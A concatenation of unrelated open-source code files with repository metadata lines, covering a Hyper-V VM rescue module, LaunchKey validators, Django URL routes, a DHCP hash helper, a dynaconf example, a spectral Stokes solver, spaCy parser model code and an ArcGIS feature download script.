raise exception.InterfaceDetachFailed(
instance_uuid=instance.uuid)
LOG.debug('Detaching vif: %s', vif['id'], instance=instance)
self._vif_driver.unplug(instance, vif)
self._vmutils.destroy_nic(instance.name, vif['id'])
except os_win_exc.HyperVVMNotFoundException:
            # TODO(claudiub): set log level to error after the string freeze.
LOG.debug("Instance not found during detach interface. It "
"might have been destroyed beforehand.",
instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
def rescue_instance(self, context, instance, network_info, image_meta,
rescue_password):
try:
self._rescue_instance(context, instance, network_info,
image_meta, rescue_password)
except Exception as exc:
with excutils.save_and_reraise_exception():
LOG.error("Instance rescue failed. Exception: %(exc)s. "
"Attempting to unrescue the instance.",
{'exc': exc}, instance=instance)
self.unrescue_instance(instance)
def _rescue_instance(self, context, instance, network_info, image_meta,
rescue_password):
rescue_image_id = image_meta.id or instance.image_ref
rescue_vhd_path = self._create_root_vhd(
context, instance, rescue_image_id=rescue_image_id)
rescue_vm_gen = self.get_image_vm_generation(instance.uuid,
image_meta)
vm_gen = self._vmutils.get_vm_generation(instance.name)
if rescue_vm_gen != vm_gen:
err_msg = _('The requested rescue image requires a different VM '
'generation than the actual rescued instance. '
'Rescue image VM generation: %(rescue_vm_gen)s. '
'Rescued instance VM generation: %(vm_gen)s.') % dict(
rescue_vm_gen=rescue_vm_gen,
vm_gen=vm_gen)
raise exception.ImageUnacceptable(reason=err_msg,
image_id=rescue_image_id)
root_vhd_path = self._pathutils.lookup_root_vhd_path(instance.name)
if not root_vhd_path:
err_msg = _('Instance root disk image could not be found. '
'Rescuing instances booted from volume is '
'not supported.')
raise exception.InstanceNotRescuable(reason=err_msg,
instance_id=instance.uuid)
controller_type = VM_GENERATIONS_CONTROLLER_TYPES[vm_gen]
self._vmutils.detach_vm_disk(instance.name, root_vhd_path,
is_physical=False)
self._attach_drive(instance.name, rescue_vhd_path, 0,
self._ROOT_DISK_CTRL_ADDR, controller_type)
self._vmutils.attach_scsi_drive(instance.name, root_vhd_path,
drive_type=constants.DISK)
if configdrive.required_by(instance):
self._detach_config_drive(instance.name)
rescue_configdrive_path = self._create_config_drive(
context,
instance,
injected_files=None,
admin_password=rescue_password,
network_info=network_info,
rescue=True)
self.attach_config_drive(instance, rescue_configdrive_path,
vm_gen)
self.power_on(instance)
def unrescue_instance(self, instance):
self.power_off(instance)
root_vhd_path = self._pathutils.lookup_root_vhd_path(instance.name)
rescue_vhd_path = self._pathutils.lookup_root_vhd_path(instance.name,
rescue=True)
if (instance.vm_state == vm_states.RESCUED and
not (rescue_vhd_path and root_vhd_path)):
err_msg = _('Missing instance root and/or rescue image. '
'The instance cannot be unrescued.')
raise exception.InstanceNotRescuable(reason=err_msg,
instance_id=instance.uuid)
vm_gen = self._vmutils.get_vm_generation(instance.name)
controller_type = VM_GENERATIONS_CONTROLLER_TYPES[vm_gen]
self._vmutils.detach_vm_disk(instance.name, root_vhd_path,
is_physical=False)
if rescue_vhd_path:
self._vmutils.detach_vm_disk(instance.name, rescue_vhd_path,
is_physical=False)
fileutils.delete_if_exists(rescue_vhd_path)
self._attach_drive(instance.name, root_vhd_path, 0,
self._ROOT_DISK_CTRL_ADDR, controller_type)
self._detach_config_drive(instance.name, rescue=True, delete=True)
        # Reattach the configdrive, if it exists and is not already attached.
configdrive_path = self._pathutils.lookup_configdrive_path(
instance.name)
if configdrive_path and not self._vmutils.is_disk_attached(
configdrive_path, is_physical=False):
self.attach_config_drive(instance, configdrive_path, vm_gen)
self.power_on(instance)
def _set_instance_disk_qos_specs(self, instance):
quota_specs = self._get_scoped_flavor_extra_specs(instance, 'quota')
disk_total_bytes_sec = int(
quota_specs.get('disk_total_bytes_sec') or 0)
disk_total_iops_sec = int(
quota_specs.get('disk_total_iops_sec') or
self._volumeops.bytes_per_sec_to_iops(disk_total_bytes_sec))
if disk_total_iops_sec:
local_disks = self._get_instance_local_disks(instance.name)
for disk_path in local_disks:
self._vmutils.set_disk_qos_specs(disk_path,
disk_total_iops_sec)
def _get_instance_local_disks(self, instance_name):
instance_path = self._pathutils.get_instance_dir(instance_name)
instance_disks = self._vmutils.get_vm_storage_paths(instance_name)[0]
local_disks = [disk_path for disk_path in instance_disks
if instance_path in disk_path]
return local_disks
def _get_scoped_flavor_extra_specs(self, instance, scope):
extra_specs = instance.flavor.extra_specs or {}
filtered_specs = {}
for spec, value in extra_specs.items():
if ':' in spec:
_scope, key = spec.split(':')
if _scope == scope:
filtered_specs[key] = value
return filtered_specs
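    # Example for the method above (values illustrative): extra_specs of
    # {'quota:disk_total_iops_sec': '500', 'os:secure_boot': 'required'}
    # filtered with scope 'quota' returns {'disk_total_iops_sec': '500'}.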
| apache-2.0 | 2,815,185,111,773,525,000 | 44.140195 | 79 | 0.573919 | false | 4.314562 | true | false | false |
andychase/eventizer | parse/keywords.py | 1 | 1350 | def merge_words(words, desc):
"""
>>> list(merge_words(["Wow", "Yo", "Yo"], "Wow and Yo Yo"))
['Wow', 'Yo Yo']
"""
size = len(words)
skipNext = False
for i, word in enumerate(words):
if skipNext:
skipNext = False
continue
if i + 1 < size:
comb = word + " " + words[i + 1]
if desc.find(comb) != -1:
yield comb
skipNext = True
else:
yield word
else:
yield word
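# Note on merge_words above: the merge is greedy and pairwise, so three
# adjacent capitalized words such as "New York City" become
# ["New York", "City"], since each word is merged with at most one
# following word.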
def is_lowercase(letter):
    return letter.lower() == letter
def get_keywords(text):
    """
    >>> get_keywords("Go and see Vince Vincent")
    ['Go', 'Vince Vincent']
    >>> get_keywords("GO AND SEE VINCE VINCENT")
    []
    """
    words = text.split(" ")
    # Get words longer than one letter
    words = filter(lambda word: len(word) > 1, words)
    # Keep only words that start with a capital letter
    words = filter(lambda word: not is_lowercase(word[0]), words)
    # Drop ALL-CAPS words (the second letter must be lowercase)
    words = filter(lambda word: is_lowercase(word[1]), words)
# Merge words that are adjacent
words = list(merge_words(words, text))
return words | mit | 6,268,337,354,913,017,000 | 27.391304 | 64 | 0.528889 | false | 3.947368 | false | false | false |
iovation/launchkey-python | launchkey/entities/validation.py | 2 | 10429 | """Validators"""
# pylint: disable=too-few-public-methods
from formencode import Schema, validators, ForEach
from ..utils.validation import ValidateISODate
class PublicKeyValidator(Schema):
"""Public Key entity Validator"""
id = validators.String()
active = validators.Bool()
date_created = ValidateISODate()
date_expires = ValidateISODate()
public_key = validators.String()
key_type = validators.Int(if_missing=0, if_empty=0)
allow_extra_fields = True
class DirectoryUserDeviceLinkResponseValidator(Schema):
"""Directory User Device link response validator"""
qrcode = validators.String() # URL
code = validators.String(min=7)
device_id = validators.String()
allow_extra_fields = True
class DirectoryGetDeviceResponseValidator(Schema):
"""Directory get Device response validator"""
id = validators.String()
name = validators.String()
status = validators.Int()
type = validators.String()
allow_extra_fields = True
class DirectoryGetSessionsValidator(Schema):
"""Directory get Sessions validator"""
auth_request = validators.String()
date_created = ValidateISODate()
service_icon = validators.String()
service_id = validators.String()
service_name = validators.String()
allow_extra_fields = True
class DirectoryValidator(Schema):
"""Directory entity validator"""
id = validators.String()
service_ids = ForEach(validators.String())
sdk_keys = ForEach(validators.String())
premium = validators.Bool()
name = validators.String()
android_key = validators.String()
ios_certificate_fingerprint = validators.String()
active = validators.Bool()
denial_context_inquiry_enabled = validators.Bool(if_empty=False,
if_missing=False)
webhook_url = validators.String()
allow_extra_fields = True
class DirectoryDeviceLinkCompletionValidator(Schema):
"""Directory User Device link completion validator"""
type = validators.OneOf(['DEVICE_LINK_COMPLETION'])
device_id = validators.String()
device_public_key = validators.String()
device_public_key_id = validators.String()
allow_extra_fields = True
class AuthorizationResponseValidator(Schema):
"""Authorization Response entity validator"""
auth = validators.String()
auth_jwe = validators.String(if_missing=None, if_empty=None)
service_user_hash = validators.String()
org_user_hash = validators.String()
user_push_id = validators.String()
public_key_id = validators.String()
allow_extra_fields = True
class AuthorizationResponsePackageValidator(Schema):
"""Authorization Response Package entity validator"""
service_pins = ForEach()
auth_request = validators.String() # UUID
response = validators.Bool()
device_id = validators.String()
allow_extra_fields = True
class AuthMethodsValidator(Schema):
"""Auth methods validator"""
method = validators.String()
set = validators.Bool(if_empty=None)
active = validators.Bool(if_empty=None)
allowed = validators.Bool(if_empty=None)
supported = validators.Bool(if_empty=None)
user_required = validators.Bool(if_empty=None)
passed = validators.Bool(if_empty=None)
error = validators.Bool(if_empty=None)
class GeoFenceValidator(Schema):
""" GeoFence Validator, can represent both GeoFence and GeoCircleFence """
name = validators.String(if_missing=None)
latitude = validators.Number()
longitude = validators.Number()
radius = validators.Number()
class GeoCircleFenceValidator(GeoFenceValidator):
""" GeoFence Validator, can represent ONLY GeoCircleFence """
type = validators.OneOf(["GEO_CIRCLE"])
class TerritoryFenceValidator(Schema):
""" TerritoryFence Validator"""
name = validators.String(if_missing=None)
type = validators.OneOf(["TERRITORY"], if_missing=None)
country = validators.Regex(r"^[A-Z]{2}$", not_empty=True)
administrative_area = validators.Regex(r"^[A-Z]{2}-[A-Z]{2}[A-Z]?$",
if_missing=None)
postal_code = validators.String(if_missing=None, if_empty=None)
@staticmethod
def _validate_python(value, _state):
if not value["administrative_area"]:
del value["administrative_area"]
if not value["postal_code"]:
del value["postal_code"]
class FenceValidator(Schema):
"""Fence validator"""
allow_extra_fields = True
type = validators.OneOf(["GEO_CIRCLE", "TERRITORY"], if_missing=None)
name = validators.String(if_missing=None)
@staticmethod
def _validate_python(value, _state):
if not value["type"]:
del value["type"]
GeoFenceValidator().to_python(value)
elif value["type"] == "GEO_CIRCLE":
GeoCircleFenceValidator().to_python(value)
elif value["type"] == "TERRITORY":
TerritoryFenceValidator().to_python(value)
class AuthPolicyValidator(Schema):
"""Auth policy validate for auth method insights"""
requirement = validators.String(if_missing=None, if_empty=None)
amount = validators.Number(if_missing=None)
types = ForEach(validators.String(), if_missing=None)
geofences = ForEach(FenceValidator(), if_missing=[], if_empty=[])
class PolicyTerritoryValidator(Schema):
"""Validates Territory fences inside policies"""
allow_extra_fields = True
country = validators.String(not_empty=True)
administrative_area = validators.String(if_missing=None)
postal_code = validators.String(if_missing=None, if_empty=None)
class PolicyGeoCircleValidator(Schema):
"""Validates GeoCircle fences inside policies"""
allow_extra_fields = True
latitude = validators.Number(not_empty=True)
longitude = validators.Number(not_empty=True)
radius = validators.Number(not_empty=True)
class PolicyFenceValidator(Schema):
"""Validates fence objects in policies"""
allow_extra_fields = True
type = validators.String(not_empty=True)
name = validators.String(if_missing=None, not_empty=True)
@staticmethod
def _validate_other(value, state):
if "type" in value:
if value["type"] == "TERRITORY":
value.update(PolicyTerritoryValidator().to_python(
value, state))
elif value["type"] == "GEO_CIRCLE":
value.update(PolicyGeoCircleValidator().to_python(
value, state))
return value
class ConditionalGeoFenceValidator(Schema):
"""Validates conditional geofence policies"""
allow_extra_fields = True
inside = validators.NotEmpty(accept_iterator=True)
outside = validators.NotEmpty(accept_iterator=True)
fences = ForEach(not_empty=True)
@staticmethod
def _validate_python(value, state):
if 'inside' in value and 'outside' in value:
value['inside'] = PolicyBaseValidator().to_python(
value['inside'], state)
value['outside'] = PolicyBaseValidator().to_python(
value['outside'], state)
return value
class MethodAmountPolicyValidator(Schema):
"""Validates method amount policies"""
allow_extra_fields = True
amount = validators.Int(not_empty=True)
class FactorsPolicyValidator(Schema):
"""Validates factors for policies"""
allow_extra_fields = True
factors = ForEach(validators.OneOf(
["KNOWLEDGE", "INHERENCE", "POSSESSION"]), not_empty=True)
class PolicyBaseValidator(Schema):
"""Base policy validator for legacy and new policies"""
allow_extra_fields = True
type = validators.String(if_missing="LEGACY")
fences = ForEach(PolicyFenceValidator())
@staticmethod
def _validate_python(value, state):
if value["type"] == "COND_GEO":
value.update(ConditionalGeoFenceValidator().to_python(
value, state))
elif value["type"] == "METHOD_AMOUNT":
value.update(MethodAmountPolicyValidator().to_python(value, state))
elif value["type"] == "FACTORS":
value.update(FactorsPolicyValidator().to_python(value, state))
elif value["type"] == "LEGACY":
if "deny_rooted_jailbroken" in value:
del value["deny_rooted_jailbroken"]
if "deny_emulator_simulator" in value:
del value["deny_emulator_simulator"]
del value["fences"]
return value
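# Dispatch summary for PolicyBaseValidator above: COND_GEO validates the
# inside/outside sub-policies, METHOD_AMOUNT requires an integer amount,
# FACTORS requires a factor list, and LEGACY payloads have their fences and
# deny_* flags stripped before being returned.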
class ServiceSecurityPolicyValidator(PolicyBaseValidator):
"""Service Policy validator"""
allow_extra_fields = True
deny_rooted_jailbroken = validators.Bool(if_missing=None)
deny_emulator_simulator = validators.Bool(if_missing=None)
class JWEAuthorizationResponsePackageValidator(Schema):
"""Authorization Response JWE payload entity validator"""
service_pins = ForEach()
auth_request = validators.String() # UUID
type = validators.String()
reason = validators.String()
denial_reason = validators.String(if_missing=None, if_empty=None)
device_id = validators.String()
auth_policy = AuthPolicyValidator(if_missing=None)
auth_methods = ForEach(AuthMethodsValidator())
allow_extra_fields = True
class AuthorizeValidator(Schema):
"""Authorize entity validator"""
auth_request = validators.String(not_empty=True)
push_package = validators.String(if_missing=None, not_empty=True)
device_ids = ForEach(validators.String(), if_missing=None)
allow_extra_fields = True
class AuthorizeSSEValidator(Schema):
"""Authorize server-sent-event (webhook) validator"""
service_user_hash = validators.String()
api_time = validators.String()
allow_extra_fields = True
class ServiceValidator(Schema):
"""Service entity validation"""
id = validators.String()
icon = validators.String()
name = validators.String()
description = validators.String()
active = validators.Bool()
callback_url = validators.String()
allow_extra_fields = True
class ServiceTOTPVerificationValidator(Schema):
"""Service TOTP verification validation"""
valid = validators.Bool()
allow_extra_fields = True
class DirectoryUserTOTPValidator(Schema):
"""Directory TOTP post validator"""
algorithm = validators.String()
digits = validators.Int()
period = validators.Int()
secret = validators.String()
allow_extra_fields = True
| mit | 8,261,304,007,005,720,000 | 32.86039 | 79 | 0.678205 | false | 4.040682 | false | false | false |
SkillSmart/ConferenceManagementSystem | Portal/urls.py | 1 | 1214 | from django.conf.urls import url, include
from . import views
app_name = 'portal'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^competition/$', views.CompetitionIndex.as_view(), name='competition'),
url(r'^venue/$', views.VenueIndex.as_view(), name="venues"),
url(r'^venue/manage/$', views.VenueManagementView.as_view(), name="manage_venue"),
url(r'^venue/create/$', views.VenueCreate.as_view(), name='create_venue'),
url(r'^venue/(?P<slug>.+)/', views.VenueDetailView.as_view(), name="venue_detail"),
url(r'^teams/$', views.TeamListView.as_view(), name='teams'),
url(r'^teams/(?P<slug>[\w\-]+)/$', views.TeamDetailView.as_view(), name="team_profile"),
url(r'^teams/(?P<slug>[\w\-]+)/edit/$', views.TeamEditView.as_view(), name="edit_team"),
url(r'^experts/$', views.ExpertListView.as_view(), name='experts'),
url(r'^expert/(?P<slug>[\w\.]+)/$', views.ExpertDetailView.as_view(), name='expert_profile'),
url(r'^students/$', views.StudentListView.as_view(), name="students"),
url(r'^student/(?P<slug>[\w\.]+)/', views.StudentDetailView.as_view(), name='student_profile'),
url(r'^session/', include('SessionManagement.urls')),
] | mit | 1,118,255,267,880,372,000 | 56.857143 | 99 | 0.64168 | false | 3.145078 | false | true | false |
rubydhash/webradius | config_server/freeradius/raddb/python/txthash.py | 1 | 2346 | # -*- coding: utf-8 -*-
import re
import md5
import string
from exceptions import Exception
class TxtHash:
__id = None
__hw_type = None
__regex = None
__is_id = None
__digs = None
__regex_str = "([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})"
def __init__(self, is_id, clientid_or_mac, hw_type):
self.__id = clientid_or_mac
self.__hw_type = hw_type
self.__is_id = is_id
self.__digs = string.digits + string.lowercase
self.__regex = re.compile(self.__regex_str, re.IGNORECASE)
    # Returns the value for the given hw_type; only Ethernet is supported for now
def hw_type_to_int(self):
return {
'Ethernet': 1,
}[self.__hw_type]
def __int2base(self, x, base):
if x < 0:
sign = -1
elif x == 0:
return '0'
else:
sign = 1
x *= sign
digits = []
while x:
digits.append(self.__digs[x % base])
x /= base
if sign < 0:
digits.append('-')
digits.reverse()
return ''.join(digits)
def __get_prefix(self):
        # A "31" prefix means the DHCP "Client-Identifier" field was used
        # to compute the hash
if self.__is_id:
return "31"
else:
return "00"
def txt(self):
try:
mac_itens = []
            # Collect the groups from the regex matches
for item in re.finditer(self.__regex, self.__id):
for item2 in item.groups():
mac_itens.append(item2)
            # Start with the value for the given hw_type
decimals = [self.hw_type_to_int()]
            # Convert each hex element to decimal
for item in mac_itens:
a = int(item, 16)
decimals.append(a)
            # Compute the md5 digest
m = md5.new()
m.update(bytearray(decimals))
            # Return the digest with the prefix prepended
return self.__get_prefix() + m.hexdigest()
except Exception:
raise Exception("Error calculating TXT hash.")
| lgpl-2.1 | -4,038,245,052,719,588,000 | 28.3125 | 148 | 0.469083 | false | 3.547655 | false | false | false |
rochacbruno/dynaconf | example/multiple_sources/app.py | 1 | 1469 | from dynaconf import settings
print("Read from settings.py:", settings.PYTHON_VAR) # noqa
# BY DEFAULT 'development' is the current env
print("Read from development_settings.py:", settings.PYTHON_DEV_VAR) # noqa
# If ENV_FOR_DYNACONF=production is set in the environment, then:
# print("Read from production_settings.py:", settings.PYTHON_PROD_VAR) # noqa
# global_ overrides previous configs
print("Read from global_settings.py:", settings.PYTHON_GLOBAL_VAR) # noqa
print("Read from settings.yaml:", settings.YAML_VAR) # noqa
print("Read from settings.yml:", settings.YML_VAR) # noqa
print("Read from settings.toml:", settings.TOML_VAR) # noqa
print("Read from settings.tml:", settings.TML_VAR) # noqa
print("Read from settings.ini:", settings.INI_VAR) # noqa
print("Read from settings.conf:", settings.CONF_VAR) # noqa
print("Read from settings.properties:", settings.PROPERTIES_VAR) # noqa
print("Read from settings.json:", settings.JSON_VAR) # noqa
print("Read from .env:", settings.ENV_VAR) # noqa
print("Read from .env:", settings.WORKS) # noqa
assertions = {
"YAML_VAR": True,
"YML_VAR": True,
"TOML_VAR": True,
"INI_VAR": "1",
"CONF_VAR": "1",
"PROPERTIES_VAR": "1",
"JSON_VAR": True,
"ENV_VAR": True,
"WORKS": "multiple_sources",
}
for key, value in assertions.items():
found = settings.get(key)
assert found == getattr(settings, key)
assert found == value, f"expected: {key}: [{value}] found: [{found}]"
| mit | 6,942,934,247,941,992,000 | 33.97619 | 78 | 0.682097 | false | 3.193478 | false | false | false |
spectralDNS/shenfun | demo/Stokes2NP.py | 1 | 4031 | r"""Solve Stokes equations using a coupled formulation
The Stokes equations are in strong form
.. math::
-\nabla^2 u - \nabla p &= f \\
\nabla \cdot u &= h \\
u(x, y=\pm 1) &= 0 \\
u(x=\pm 1, y) &= 0
where :math:`f` and :math:`h` are given functions of space.
In addition we require :math:`\int_{\Omega} p \, dx = 0`, which is achieved by
fixing the coefficient :math:`\hat{p}_{0, 0} = 0`.
We use a tensor product space with a composite basis for the Dirichlet
space and a regular orthogonal basis for the pressure space.
To remove all nullspaces we use a P_{N} x P_{N-2} basis, with P_{N-2} for the
pressure.
"""
import os
import numpy as np
from sympy import symbols, sin, cos
from shenfun import *
x, y = symbols("x,y", real=True)
assert comm.Get_size() == 1, "The solver for two non-periodic directions is only implemented for serial runs"
# Some right hand side (manufactured solution)
#uex = (cos(4*np.pi*x)+sin(2*np.pi*y))*(1-y**2)*(1-x**2)
#uey = (sin(2*np.pi*x)+cos(6*np.pi*y))*(1-y**2)*(1-x**2)
uex = (cos(2*np.pi*x)*sin(2*np.pi*y))*(1-y**2)*(1-x**2)
uey = (-sin(2*np.pi*x)*cos(2*np.pi*y))*(1-x**2)
pe = -0.1*sin(2*x)*sin(4*y)
fx = -uex.diff(x, 2) - uex.diff(y, 2) - pe.diff(x, 1)
fy = -uey.diff(x, 2) - uey.diff(y, 2) - pe.diff(y, 1)
h = uex.diff(x, 1) + uey.diff(y, 1)
N = (50, 50)
family = 'Chebyshev'
#family = 'Legendre'
D0X = FunctionSpace(N[0], family, bc=(0, 0), scaled=True)
D0Y = FunctionSpace(N[1], family, bc=(-sin(2*np.pi*x)*(1-x**2), -sin(2*np.pi*x)*(1-x**2)), scaled=True)
D1Y = FunctionSpace(N[1], family, bc=(0, 0), scaled=True)
PX = FunctionSpace(N[0], family)
PY = FunctionSpace(N[1], family)
TD = TensorProductSpace(comm, (D0X, D0Y))
TD1 = TensorProductSpace(comm, (D0X, D1Y))
Q = TensorProductSpace(comm, (PX, PY), modify_spaces_inplace=True)
V = VectorSpace([TD1, TD])
VQ = CompositeSpace([V, Q])
# To get a P_N x P_{N-2} space, just pick the first N-2 items of the pressure basis
# Note that this effectively sets P_N and P_{N-1} to zero, but still the basis uses
# the same quadrature points as the Dirichlet basis, which is required for the inner
# products.
PX.slice = lambda: slice(0, PX.N-2)
PY.slice = lambda: slice(0, PY.N-2)
up = TrialFunction(VQ)
vq = TestFunction(VQ)
u, p = up
v, q = vq
# Assemble blocks of the complete block matrix
if family.lower() == 'legendre':
A00 = inner(grad(v), grad(u))
A01 = inner(div(v), p)
else:
A00 = inner(v, -div(grad(u)))
A01 = inner(v, -grad(p))
A10 = inner(q, div(u))
M, BM = BlockMatrices(A00+A01+A10) # Note BM is boundary matrix
uh_hat = Function(VQ)
# Assemble right hand side
fh = Array(VQ, buffer=(fx, fy, h))
f_, h_ = fh
fh_hat = Function(VQ)
f_hat, h_hat = fh_hat
f_hat = inner(v, f_, output_array=f_hat)
h_hat = inner(q, h_, output_array=h_hat)
# Solve problem
uh_hat = M.solve(fh_hat, u=uh_hat, constraints=((2, 0, 0),), BM=BM)
# (2, N[0]-1, 0),
# (2, N[0]*N[1]-1, 0),
# (2, N[0]*N[1]-N[1], 0))) # Constraint for component 2 of mixed space
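# The constraint (2, 0, 0) pins the first pressure coefficient,
# \hat{p}_{0,0} = 0, removing the pressure nullspace mentioned in the
# module docstring.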
# Move solution to regular Function
up = uh_hat.backward()
u_, p_ = up
# Exact solution
ux, uy = Array(V, buffer=(uex, uey))
pe = Array(Q, buffer=pe)
# Compute error
error = [comm.reduce(np.linalg.norm(ux-u_[0])),
comm.reduce(np.linalg.norm(uy-u_[1])),
comm.reduce(np.linalg.norm(pe-p_))]
if comm.Get_rank() == 0:
print('Error u v p')
print(' %2.4e %2.4e %2.4e' %(error[0], error[1], error[2]))
#assert np.all(abs(np.array(error)) < 1e-7), error
if 'pytest' not in os.environ:
import matplotlib.pyplot as plt
plt.figure()
X = TD.local_mesh(True)
plt.contourf(X[0], X[1], p_, 100)
plt.figure()
plt.contourf(X[0], X[1], pe, 100)
plt.figure()
plt.quiver(X[0], X[1], u_[0], u_[1])
plt.figure()
plt.quiver(X[0], X[1], ux, uy)
plt.figure()
plt.spy(M.diags())
plt.figure()
plt.contourf(X[0], X[1], u_[0], 100)
#plt.show()
| bsd-2-clause | -389,010,432,669,954,800 | 29.308271 | 117 | 0.592905 | false | 2.486737 | false | false | false |
spacy-io/spaCy | spacy/ml/tb_framework.py | 1 | 1420 | from thinc.api import Model, noop
from .parser_model import ParserStepModel
def TransitionModel(
tok2vec, lower, upper, resize_output, dropout=0.2, unseen_classes=set()
):
"""Set up a stepwise transition-based model"""
if upper is None:
has_upper = False
upper = noop()
else:
has_upper = True
# don't define nO for this object, because we can't dynamically change it
return Model(
name="parser_model",
forward=forward,
dims={"nI": tok2vec.get_dim("nI") if tok2vec.has_dim("nI") else None},
layers=[tok2vec, lower, upper],
refs={"tok2vec": tok2vec, "lower": lower, "upper": upper},
init=init,
attrs={
"has_upper": has_upper,
"unseen_classes": set(unseen_classes),
"resize_output": resize_output,
},
)
def forward(model, X, is_train):
step_model = ParserStepModel(
X,
model.layers,
unseen_classes=model.attrs["unseen_classes"],
train=is_train,
has_upper=model.attrs["has_upper"],
)
return step_model, step_model.finish_steps
def init(model, X=None, Y=None):
model.get_ref("tok2vec").initialize(X=X)
lower = model.get_ref("lower")
lower.initialize()
if model.attrs["has_upper"]:
statevecs = model.ops.alloc2f(2, lower.get_dim("nO"))
model.get_ref("upper").initialize(X=statevecs)
| mit | 8,833,489,119,848,649,000 | 28.583333 | 78 | 0.602817 | false | 3.454988 | false | false | false |
wakamori/GoForIt | 1/1-1.py | 1 | 1788 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
1-1.py
license BSD
author chen_ji <wakamori111 at gmail.com>
"""
import datetime
import random
import sys
class DayLife:
"""Life in a day."""
def __init__(self, date, life):
"""Set birth datetime and life."""
self.birthdate = date
self.life = life
finalyear = self.birthdate.year + self.life
finaldate = datetime.datetime(finalyear, self.birthdate.month,
self.birthdate.day)
self.finaldate = finaldate - datetime.timedelta(days=1)
def now(self):
"""Calculate current time."""
curdate = datetime.datetime.now()
maxdays = (self.finaldate - self.birthdate).days
curdays = (curdate - self.birthdate).days
curtime = datetime.timedelta(days=1) / maxdays
curtime = curtime * curdays
return datetime.time(
(curtime.seconds / 60) / 60,
(curtime.seconds / 60) % 60,
curtime.seconds % 60)
if __name__ == '__main__':
# options
startyear = 1990
endyear = 2000
life = 80
print startyear, "<= a <=", endyear
print "n =", life
daycount = (datetime.datetime(endyear, 12, 31) -
datetime.datetime(startyear, 1, 1)).days
birthdate = datetime.datetime(startyear, 1, 1) + \
datetime.timedelta(days=random.randint(0, daycount))
args = sys.argv
if len(args) == 4:
year = int(args[1])
month = int(args[2])
date = int(args[3])
birthdate = datetime.datetime(year, month, date)
print "birthdate:", birthdate.date()
mylife = DayLife(birthdate, life)
print "finaldate:", mylife.finaldate.date()
print "today:", mylife.now()
| bsd-2-clause | -1,893,952,449,638,936,800 | 29.827586 | 72 | 0.571588 | false | 3.64898 | false | false | false |
adambreznicky/javascript | Guardrail/Snake/downloadGET_v1.py | 1 | 3746 | __file__ = 'downloadGET_v1'
__date__ = '11/12/2015'
__author__ = 'ABREZNIC'
import arcpy, zipfile, os, shutil, urllib, urllib2, json, glob
# http://blogs.esri.com/esri/arcgis/2013/10/10/quick-tips-consuming-feature-services-with-geoprocessing/
district = arcpy.GetParameterAsText(0)
username = arcpy.GetParameterAsText(1)
password = arcpy.GetParameterAsText(2)
output = arcpy.GetParameterAsText(3).replace("\\", os.sep)
downloadFormat = arcpy.GetParameterAsText(4)  # assumed 5th script parameter ("FGDB" or "SHP"); used below but never defined in the original
directory = arcpy.env.scratchFolder + os.sep + district + "_GET"
if not os.path.exists(directory):
os.makedirs(directory)
else:
shutil.rmtree(directory)
os.makedirs(directory)
arcpy.AddMessage("directory created.")
baseURL = "http://services.arcgis.com/KTcxiTD9dsQw4r7Z/arcgis/rest/services/GET_Maintenance_AGO/FeatureServer/0/query"
arcpy.AddMessage("url created.")
if district == "Statewide":
where = "1=1"
else:
where = ""
def getObjectIDs(query):
params = {'where': query, 'returnIdsOnly': 'true', 'token': token, 'f': 'json'}
req = urllib2.Request(baseURL, urllib.urlencode(params))
response = urllib2.urlopen(req)
data = json.load(response)
array = data["objectIds"]
array.sort()
arcpy.AddMessage("Object IDs Found")
return array
def createFC(fs):
arcpy.CreateFileGDB_management(directory, "TxDOT_GuardrailEndTreatments")
fgdb = directory + os.sep + "TxDOT_GuardrailEndTreatments"
arcpy.CopyFeatures_management(fs, fgdb + ".gdb" + os.sep + "GET_" + district + "Dist")
newFC = fgdb + ".gdb" + os.sep + "GET_" + district + "Dist"
arcpy.AddMessage("feature class created.")
return newFC
def updatedQuery(low, high, trigger):
if low != high:
addition = """ AND "OBJECTID" >= """ + str(low) + " AND " + """"OBJECTID" < """ + str(high)
if trigger == 1:
addition = """ AND "OBJECTID" >= """ + str(low)
else:
addition = """ AND "OBJECTID" = """ + str(low)
newQuery = where + addition
return newQuery
try:
arcpy.AddMessage('\nGenerating Token\n')
server = baseURL.split("//")[1].split("/")[0]
tokenURL = 'http://' + server + '/arcgis/tokens/?username=' + username + '&password=' + password + '&referer=http%3A%2F%2F' + server + '&f=json'
req = urllib2.Request(tokenURL)
response = urllib2.urlopen(req)
data = json.load(response)
token = data['token']
except:
token = ''
pass
fields = '*'
objectIDs = getObjectIDs(where)
total = len(objectIDs)
arcpy.AddMessage("Total: " + str(total))
totalFixed = total - 1
last = objectIDs[-1]
low = 0
high = 1000
theFC = ""
while low < total:  # '<' (not '<=') avoids an IndexError when total is an exact multiple of 1000
    arcpy.AddMessage(low)
    min_oid = objectIDs[low]  # renamed from min/max to avoid shadowing the built-ins
    try:
        max_oid = objectIDs[high]
        trigger = 0
    except IndexError:
        max_oid = objectIDs[totalFixed]
        trigger = 1
    OIDquery = updatedQuery(min_oid, max_oid, trigger)
query = "?where={}&outFields={}&returnGeometry=true&f=json&token={}".format(OIDquery, fields, token)
fsURL = baseURL + query
fs = arcpy.FeatureSet()
fs.load(fsURL)
arcpy.AddMessage("select completed.")
if low == 0:
theFC = createFC(fs)
else:
arcpy.Append_management(fs, theFC, "NO_TEST")
low += 1000
high += 1000
arcpy.AddMessage("packing up...")
zipper = output
if os.path.isfile(zipper):
os.remove(zipper)
arcpy.AddMessage("zipfile started.")
if downloadFormat == "FGDB":
newZipper = zipper[:-4]
shutil.make_archive(newZipper, "zip", directory)
elif downloadFormat == "SHP":
    zf = zipfile.ZipFile(zipper, 'w', zipfile.ZIP_DEFLATED)  # renamed from zip to avoid shadowing the built-in
    for filename in os.listdir(directory):
        if not filename.endswith('.lock'):
            zf.write(os.path.join(directory, filename), filename)
    zf.close()
arcpy.AddMessage("zipfile completed.")
arcpy.AddMessage("that's all folks!!") | mit | -4,923,730,972,539,032,000 | 30.754237 | 148 | 0.64976 | false | 3.201709 | false | false | false |
pculture/mirocommunity | localtv/admin/flatpages_views.py | 1 | 2483 | from django.contrib.flatpages.models import FlatPage
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
